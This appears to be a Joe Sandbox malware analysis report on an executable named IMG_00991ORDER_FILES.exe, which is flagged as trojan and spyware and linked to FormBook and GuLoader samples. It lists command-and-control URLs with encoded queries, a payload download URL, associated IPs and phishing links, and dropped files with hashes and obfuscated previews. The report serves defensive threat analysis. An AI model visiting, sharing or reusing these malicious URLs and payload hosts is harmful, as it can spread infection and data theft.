www.tmglift.xyz	unknown	unknown	true	unknown
www.23ddv.top	unknown	unknown	true	unknown
www.ayna-pro.shop	unknown	unknown	true	unknown
www.esistiliya.online	unknown	unknown	true	unknown
www.tyai36.top	unknown	unknown	true	unknown
www.kapiextra.com	unknown	unknown	true	unknown
www.bola88site.one	unknown	unknown	true	unknown
www.at8l4.shop	unknown	unknown	true	unknown
www.policydetails.online	unknown	unknown	true	unknown
www.gyver.cloud	unknown	unknown	true	unknown
www.terrearcenciel.online	unknown	unknown	true	unknown
www.950021.com	unknown	unknown	true	unknown
www.kiristyle.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.at8l4.shop/euco/	true	Avira URL Cloud: safe	unknown
http://www.tyai36.top/7te8/	true	Avira URL Cloud: safe	unknown
http://www.policydetails.online/w4ze/	true	Avira URL Cloud: safe	unknown
http://www.tmglift.xyz/fu44/	true	Avira URL Cloud: safe	unknown
http://www.tmglift.xyz/fu44/?AvLLLbOh=MlL7Bon/74QoG2vpxD8T9dipagYbr0R/tXGKYkMRJkwHHENkeAO2oHPD98qp5zZW/5TdXnrAZisENNCTsRHdM0U4DZ3reu4ViZt4mxUl7os1vic25L7j48U=&7RB=66nPyLG8	true	Avira URL Cloud: safe	unknown
http://www.indeks.space/1fqp/	true	Avira URL Cloud: safe	unknown
http://www.vlyra.online/evtw/?AvLLLbOh=qMLUfIVxcy5BUPOFUVVokgWijQnF2zXXVKt01YDq7Fx24AU1CDxJrzkqkKWLAIZ/xY36wLggT1PRMlR6dRNA0wLKv5lzUDW7qQMZ0amG/MTffFaAFzA5nlM=&7RB=66nPyLG8	true	Avira URL Cloud: safe	unknown
http://www.theaji.shop/q3za/?AvLLLbOh=RWnANPBTnIHygAxj+74p2fQt/r+QMu+ZbRPK+z1nLy5TPZ7mlunYNOVzlFQ68L6IsvBO8bEu8tkdQ9B+wYsoyn5BHOSzYZ2Hj+i3Yz8xBJ+jGbXNJ7HrFvE=&7RB=66nPyLG8	true	Avira URL Cloud: safe	unknown
http://www.bola88site.one/frol/?AvLLLbOh=YNeTF4pSv4+M6gG3KqO7busQPotc22z/OB6yhtk01jUCobC9Y52Gmw3Z99Ir4kEoVNEa+n0iDPzrnsm9kM3Fz3qyLYlg0011pg2PCcWBraIo86SjG5d0+YE=&7RB=66nPyLG8	true	Avira URL Cloud: safe	unknown
http://www.kapiextra.com/wRdZDseACWW137.bin	false	Avira URL Cloud: safe	unknown
http://www.bola88site.one/frol/	true	Avira URL Cloud: safe	unknown
http://www.dom-2.online/i0bg/?AvLLLbOh=bQKVVFfanjNZBfdcIZop/p51Kq/q4DLd8P4GjEmXCojBwWm3h7h09nlNydz6D8la1AjIsgIaNvk5Cs0Spg0Y+chR33DfPPxX8Qm8eqAyl/PDJccbAQNQv5M=&7RB=66nPyLG8	true	Avira URL Cloud: safe	unknown
http://www.tyai36.top/7te8/?AvLLLbOh=jDN4zPqbFf9yM+3zgc/bkSOt3FtgrIUvIR/YWyCTW7MfoJq2/oprJylb09/bpIujsG26CmWa4QbZN3EYlCF2dF9UrXrnLyDZVZ+LwV0bzVblUs0ijF56Mzs=&7RB=66nPyLG8	true	Avira URL Cloud: safe	unknown
http://www.policydetails.online/w4ze/?7RB=66nPyLG8&AvLLLbOh=d0Jtowaj2cDKdGl/ZWixKoK2UJz0xOtSqBjDY2hG4a3QahhJ7y0n5KAnu51LUWnaBzfk1RzCzkwasvfXjgFxQ6WD3nD/I11dyUYYEHS/n2QZzV395iZlwCs=	true	Avira URL Cloud: safe	unknown
http://www.dom-2.online/i0bg/	true	Avira URL Cloud: safe	unknown
http://www.indeks.space/1fqp/?7RB=66nPyLG8&AvLLLbOh=6qQxmJ3Ttl5RniwiWug+Nxykd+6yd18sY/lOZ1tjFrv55oSFkvFWhSP7kPUWLsM6iDX/GYi1Ud/wPB7htSWHGJqJldTcfRVJgzvdZiQtfUg3P6HLle1MpkQ=	true	Avira URL Cloud: safe	unknown
http://www.at8l4.shop/euco/?AvLLLbOh=GPABfGdOLFG14n4QgnBiZ+BsyIvrzjVDDLyvQv6auzHiN3b/aWsmGL4J/M+2YRVr/47k2ZlpprwluvqtoYpidrJVs8sq2aKxZBcIKy6V2Ahz0rKVLGXmBGY=&7RB=66nPyLG8	true	Avira URL Cloud: safe	unknown
http://www.23ddv.top/y2fc/	true	Avira URL Cloud: safe	unknown
http://www.kiristyle.shop/x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8	false	Avira URL Cloud: safe	unknown
http://www.gyver.cloud/7arp/	true	Avira URL Cloud: safe	unknown
http://www.23ddv.top/y2fc/?AvLLLbOh=5ZJwW+6cR+ukQX5L66hOVx0TNjHyeT2hZgA90YyTgMK9x7yRXodN7xJ1LlWJY5c/jX+OBDC/YU0F38ZFJDu2iru/QAMqsMv9PfcDIAk5SRBflopttme4W2g=&7RB=66nPyLG8	true	Avira URL Cloud: safe	unknown
http://www.kiristyle.shop/x85c/	false	Avira URL Cloud: safe	unknown
http://www.theaji.shop/q3za/	true	Avira URL Cloud: safe	unknown
http://www.gyver.cloud/7arp/?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8	true	Avira URL Cloud: safe	unknown
http://www.vlyra.online/evtw/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	IMG_00991ORDER_FILES.exe, 00000000.00000000.5788656915.000000000040A000.00000008.00000001.01000000.00000003.sdmp, IMG_00991ORDER_FILES.exe, 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000000.6546131964.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000626000.00000020.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kapiextra.com/wRdZDseACWW137.binX	IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gopher.ftp://ftp.	IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kapiextra.com/wRdZDseACWW137.binT	IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.00000000005F2000.00000020.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.00000000005F2000.00000020.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kapiextra.com/wRdZDseACWW137.bin4	IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
76.223.67.189	gyver.cloud	United States	16509	AMAZON-02US	true
199.59.243.226	www.dom-2.online	United States	395082	BODIS-NJUS	true
154.23.184.218	23ddv.top	United States	174	COGENT-174US	true
35.244.245.121	shops.vipshopbuy.com	United States	15169	GOOGLEUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true
3.82.56.39	www.theaji.shop	United States	14618	AMAZON-AESUS	true
203.161.42.73	www.vlyra.online	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
172.96.191.39	bola88site.one	Canada	59253	LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG	true
38.47.207.120	tyai36.top	United States	174	COGENT-174US	true
148.135.49.178	policydetails.online	Sweden	158	ERI-ASUS	true
23.111.141.202	kapiextra.com	United States	29802	HVC-ASUS	false
194.58.112.174	www.indeks.space	Russian Federation	197695	AS-REGRU	true
3.33.130.190	at8l4.shop	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1499873
Start date and time:	2024-08-27 17:42:26 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 18m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	IMG_00991ORDER_FILES.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/14@21/13
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, UserOOBEBroker.exe
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: IMG_00991ORDER_FILES.exe

Simulations

Behavior and APIs

Time	Type	Description
11:46:47	API Interceptor	28885338x Sleep call for process: Robocopy.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
76.223.67.189	Payment Details Swift copy.exe	Get hash	malicious	FormBook	Browse	www.23bet.xyz/ot96/?iBuliJs=gLYOJmqZpHHje3WYF+ASfR5Qj11/HvDT5keDfx+wOTe1UH4JUNvG6QaD5CfS8344cBxuJ15KCw==&iL08qv=ZL0lHDh8zB
	TRIAL_ORDER_OTHERS.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.gyver.cloud/7arp/
	#U0423#U0432#U0435#U0434#U043e#U043c#U043b#U0435#U043d#U0438#U0435 #U2116 24357.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.icaros.cloud/rdil/
	Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe	Get hash	malicious	FormBook	Browse	www.rtrpodcast.online/l2ei/
	PO TIYEY078K.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.srripaspocon.org/5if5/
	Botulismus56.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.osbornesargent.co.uk/md49/?Oh=QPM+w8Ig1ROzmMib5SDu6zuYSnXOkQr9m7samoBwdfEnV0n0l3uWLVJ7UGPwsRh8pmtmt+CAU5h/xYkYsyOGxbf0SN0yaP11Hv40L4ijSawEYWA0VnDvvTA=&sxilk=HBrl
	Scanned Docs from Emnes Metal Sdn Bhd_.exe	Get hash	malicious	FormBook	Browse	www.rtrpodcast.online/l2ei/
	SecuriteInfo.com.Win32.RATX-gen.24742.674.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.stellardaysigning.com/xb5p/
	mtTw7o41OC.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.microsofr.fun/omnp/
	Payrol list.exe	Get hash	malicious	FormBook	Browse	www.rtrpodcast.online/g3rq/
199.59.243.226	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	www.personal-loans-jp8.xyz/osae/
	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.foundation-repair.biz/enra/
	Bonelessness.exe	Get hash	malicious	Simda Stealer	Browse	ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181
	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	ww25.lyxynyx.com/login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcb
	RFQ# 2200002827.exe	Get hash	malicious	FormBook	Browse	www.pet-adoption-01.xyz/hd7z/
	RFQ# 2200002827.exe	Get hash	malicious	FormBook	Browse	www.pet-adoption-01.xyz/hd7z/
	Debit note Jan-Jul 2024.exe	Get hash	malicious	FormBook	Browse	www.dom-2.online/vnm2/
	PI#220824.exe	Get hash	malicious	FormBook	Browse	www.cancerprostata.info/b4wn/
	PURCHASE ORDER_330011 SEPTEMBER 2024.exe	Get hash	malicious	FormBook	Browse	www.myim.cloud/2mdw/
	QUOTATION - RFQ# 2200002827.exe	Get hash	malicious	FormBook	Browse	www.pet-adoption-01.xyz/hd7z/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
natroredirect.natrocdn.com	New_Order_Big_Bag_PDF.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	350.xls	Get hash	malicious	FormBook	Browse	85.159.66.93
	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	85.159.66.93
	AIDHL3290435890.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO#4510065525.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	RFQ# 2200002827.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	RFQ# 2200002827.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PI#220824.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Availability and prices - inquiry.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.indeks.space	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
www.indeks.space	TRIAL_ORDER_OTHERS.exe	Get hash	malicious	FormBook, GuLoader	Browse	194.58.112.174
www.theaji.shop	Debit note Jan-Jul 2024.exe	Get hash	malicious	FormBook	Browse	3.82.56.39
	TRIAL_ORDER_OTHERS.exe	Get hash	malicious	FormBook, GuLoader	Browse	18.204.16.85
	Filename.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	3.82.56.39

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl8RKvJCjgfWXgpyGiQbouwIVFCzJZdO6C7IEJWnFiPmUdkD_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOJptL-2BsSl02HxRvbllikFuSJtHHDkVwyIj5AuFgiubBu9sTxc8j0-2BQG5wldcZa7WyDp4BZYdRmFKi1MU2RpCFoGVLX1rLVx-2BFFfe8ZtbBDm0OusvqG9hc8jycErQH9w4yo0iZBNb6ruS35AQpqe-2Bn9sSG0dYdsEjJuPPD68-2FQoiA15kbRIRZcVBuBtywmpClclGh64Ps2rLg6E3U3-2Ft-2B24zaJbCf8tvrjozgadicpaRwQ3KIy53pMZsOUCbTeEqGc-3D#bGFtYmVydC5nZW9yZ2lhQGFpZGIub3Jn	Get hash	malicious	Unknown	Browse	13.225.78.20
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl8RKvJCjgfWXgpyGiQbouwIVFCzJZdO6C7IEJWnFiPmUdkD_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOJptL-2BsSl02HxRvbllikFuSJtHHDkVwyIj5AuFgiubBu9sTxc8j0-2BQG5wldcZa7WyDp4BZYdRmFKi1MU2RpCFoGVLX1rLVx-2BFFfe8ZtbBDm0OusvqG9hc8jycErQH9w4yo0iZBNb6ruS35AQpqe-2Bn9sSG0dYdsEjJuPPD68-2FQoiA15kbRIRZcVBuBtywmpClclGh64Ps2rLg6E3U3-2Ft-2B24zaJbCf8tvrjozgadicpaRwQ3KIy53pMZsOUCbTeEqGc-3D#bGFtYmVydC5nZW9yZ2lhQGFpZGIub3Jn	Get hash	malicious	Unknown	Browse	34.252.40.201
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl8RKvJCjgfWXgpyGiQbouwIVFCzJZdO6C7IEJWnFiPmUdkD_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOJptL-2BsSl02HxRvbllikFuSJtHHDkVwyIj5AuFgiubBu9sTxc8j0-2BQG5wldcZa7WyDp4BZYdRmFKi1MU2RpCFoGVLX1rLVx-2BFFfe8ZtbBDm0OusvqG9hc8jycErQH9w4yo0iZBNb6ruS35AQpqe-2Bn9sSG0dYdsEjJuPPD68-2FQoiA15kbRIRZcVBuBtywmpClclGh64Ps2rLg6E3U3-2Ft-2B24zaJbCf8tvrjozgadicpaRwQ3KIy53pMZsOUCbTeEqGc-3D#bGFtYmVydC5nZW9yZ2lhQGFpZGIub3Jn	Get hash	malicious	Unknown	Browse	18.239.94.124
	350.xls	Get hash	malicious	FormBook	Browse	54.65.172.3
	Vertexgroup#Signature.pdf	Get hash	malicious	Unknown	Browse	18.239.18.69
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFgXXvv2-2BWxavJhSFh1X9YeE09JxYfGZOrfNXpE1b1zMSec6V_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZNvtRLmuq9nwTUBLvlyUQLSTjA0dDcTtmNJHz5AQBzdlGtncKRz08-2BYDBtkpKhh0KX17i2fmd5it7ecx-2FWvhsbD-2BwYBTTPKQ3j-2FAyMvTur79Dsx-2FPO7GwMrKARE8VWDjAjvStKY75qeeBLXHuDipEV3KKO3k4ABqkQG2RlytfHIDieNQv9UnoJapwQuVaik0jLuTXarvnnfl3sa3LYFT4h4hVVagLZJwfqoXYBXcReN-2F1X4eM9FZF-2BvVOXIZ-2BqDy2Q-3D	Get hash	malicious	HTMLPhisher	Browse	13.225.78.33
	https://files.fm/u/vtrxvgdh6w	Get hash	malicious	GuLoader	Browse	76.223.111.18
	http://journalscene.secondstreetapp.com/api/organization_user_email_verifications?token=npv0kjeneci&opid=1033948&lrt=rmsqe55tykx&bf=bc07ae1cf7bbffb3bcd5bc7a10f031b8&ip=207.144.57.39&redirect=https://unsus3.ru/oth/chameleon/#mloomans@securustech.net	Get hash	malicious	HTMLPhisher	Browse	18.239.36.13
	http://www.empoweryourretirement.com	Get hash	malicious	Unknown	Browse	52.212.210.206
	https://www.dropbox.com/scl/fi/divczsjhc8wrt1wb18r2b/AT-Society-Directory.docx?rlkey=sjkzm3g8jkcekmsxm460sja78&st=r52leq64&dl=0	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	18.239.36.2
CIZGITR	New_Order_Big_Bag_PDF.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	85.159.66.93
	AIDHL3290435890.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO#4510065525.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	RFQ# 2200002827.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	RFQ# 2200002827.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PI#220824.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Availability and prices - inquiry.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	ptsss.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
BODIS-NJUS	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.226
	Bonelessness.exe	Get hash	malicious	Simda Stealer	Browse	199.59.243.226
	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	199.59.243.226
	javawvd.exe	Get hash	malicious	Unknown	Browse	199.59.243.226
	javawvd.exe	Get hash	malicious	Unknown	Browse	199.59.243.226
	RFQ# 2200002827.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	RFQ# 2200002827.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	CirnoBackdoorLOL.exe	Get hash	malicious	Unknown	Browse	199.59.243.226
	CirnoBackdoorLOL.exe	Get hash	malicious	Unknown	Browse	199.59.243.226
COGENT-174US	http://stream.crichd.vip/update/sscricket.php	Get hash	malicious	Unknown	Browse	154.6.190.250
	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	154.23.184.207
	AIDHL3290435890.exe	Get hash	malicious	FormBook	Browse	154.23.184.240
	SALARY OF AUG 2024.exe	Get hash	malicious	FormBook	Browse	154.23.184.141
	https://57365oo.cc/	Get hash	malicious	Phisher	Browse	38.54.80.161
	http://es.jpwn6.shop/reda/redirect.html	Get hash	malicious	Unknown	Browse	38.91.45.7
	031215-Revised-01.exe	Get hash	malicious	FormBook	Browse	206.119.82.116
	http://tsretires.co/CZNFFSN	Get hash	malicious	Unknown	Browse	143.244.187.113
	PO#4510065525.exe	Get hash	malicious	FormBook	Browse	154.23.184.240
	Quote 1T PN40 082624.exe	Get hash	malicious	FormBook	Browse	154.23.184.141

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsn2852.tmp\LangDLL.dll	FedEx Shipping Confirmation.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nsn2852.tmp\LangDLL.dll	SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll	FedEx Shipping Confirmation.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx	Get hash	malicious	Unknown	Browse
	AKgHw6grDP.exe	Get hash	malicious	GuLoader	Browse
	AKgHw6grDP.exe	Get hash	malicious	GuLoader	Browse
	PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse
	PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe	Get hash	malicious	GuLoader	Browse
	RFQ-SMC-PO-5547-SUPPLY.com.exe	Get hash	malicious	GuLoader	Browse
	RFQ-SMC-PO-5547-SUPPLY.com.exe	Get hash	malicious	GuLoader	Browse
	https://viture.com/windows	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\W346HjEgQ

Process:	C:\Windows\SysWOW64\Robocopy.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Bjergernes24.His

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	data
Category:	dropped
Size (bytes):	306158
Entropy (8bit):	7.5386784159448
Encrypted:	false
SSDEEP:	6144:wHWKnqmE6qH1tl8qLrLx9TCHp4LShyP7HOv5:wHxqVtqqLrLTTCkNLO5
MD5:	4C4105145931134682106AF3985E057D
SHA1:	FC445A1AA699284D067943557C1070E4B432D1A3
SHA-256:	E04789E803329F151D3B930408A73F16516A1418B48000BB9DC15510209699FA
SHA-512:	B6807DE5BD752FDC42A07E36F4450FEA64522BCA4C05DF5F15C248D12462E37AF65BC77E2EA6DD5B4A7D92473E4631B979A88763A72D8251BE78EA14DBAAE2D2
Malicious:	false
Reputation:	low
Preview:	..................4....................[.,...................................0.o..........KK.1..........DDD..............Z.....rrrrr...............hh.......U............kk................*....tt.mmmmmm.GGG...PPP...''..............K.........0....................u.{{{{{{{{{{............................R.......444....I....MMM..............q................................ss.....N..444.....O.............www.......9.oooo.,,..........\|\|\|\|\|..........................hh...r.Y.....s...........aaaaa...A........BB.0.............5.x.......\...e.....l...,.......U............................................. ...........]]]]]]]]]].......$.SS..rrrr.....:::.............c.}}}........................KK....4....H.#............a.e..N...z.............X.......p.....~~~........................nnn........tt.~~..J....UU.....m.......rr......+...............V.FFF.....}}}.................8......R............((.............CCC..//.....................................{...........n...........x.........555........=

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Klavier\Novellefilm.Tol

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	98912
Entropy (8bit):	2.6582700631425933
Encrypted:	false
SSDEEP:	1536:dG3p+nVEJF6Wth12aV3pHLE3cTSzFlo6BhKfdo2aNy/:la/r/
MD5:	119AFD84089F0098B2F3019C6863B051
SHA1:	53502865DB91A252965155244B1BA97E72F50124
SHA-256:	4BF6580A097827E57868FD84EEFFC981F75F79A51A5F41B6A5C65EB0E11FA500
SHA-512:	60F14FC0D534A8EC7C44D5AF2839407E74BDC5179EAE07591F90F3F7A741138C86B4D1F27221DE9330C1596B6980C21CA3879BB5FDC245E0BA4BB011B67F4C41
Malicious:	false
Reputation:	low
Preview:	0000510000E5000000BC00323200009800000000000000007373730012000000003232320000000000002F0000B6B6006E6E00000000004D00EB000000000000E10000A0A0A0A0A0A0A0A00086001D1D00000000C90000E30000F8F80000B400000000000000A8A8A800000000670023230000A8A8A8003C00B800DE00000000004E0000009600C600CA0055555555000000000000BD004949490081003B0000050500A1A10000008200E0008F8F8F8F8F00680000000000000A0000F90020005F00000000AFAF004B4B00000077777700000015000000E10000262626000000000000000000000000E6001800003400000045002B0095959595950000A80000F00000000000003F3F00009090000000008686000000160000060054540000000000005C0000000D0D0000C0003C003200006969001B00008E8E8E8E0000CBCBCBCB00DEDE0000000000002424000000B600000000B40000000024240000B5B500000000BDBD00EE00FF00BCBCBC004242001F1F00009600CE003F3F0077008C005900C6C6C60059590000009F000089002600B1B100C6C6004B00008D8D0000510000000000D3D3D3D3D300B3B3B3000000F5F5F5F5F5F500001E1E1E1E1E0000BE00008300003E3E3E0000C8000074747474000000000000FE0099000000005C5C000000000000750056565600000000006C6C

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Klavier\Roundness.ind

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	data
Category:	dropped
Size (bytes):	385015
Entropy (8bit):	1.253279247179919
Encrypted:	false
SSDEEP:	1536:kVTcKVFuJi5LXKLywcEhXygCilGHIQXMUmMAI:ywKLNLaLywRXygCilGzmMAI
MD5:	84182132BEAC6B4CDD42AE3C3504778F
SHA1:	9844B9B4ABEAC7B410809A582FE2E41BD38876A3
SHA-256:	5A2A01A88EC9FF56B80D957E4C5891A020435407F81DADA05DE58165C0C86F2D
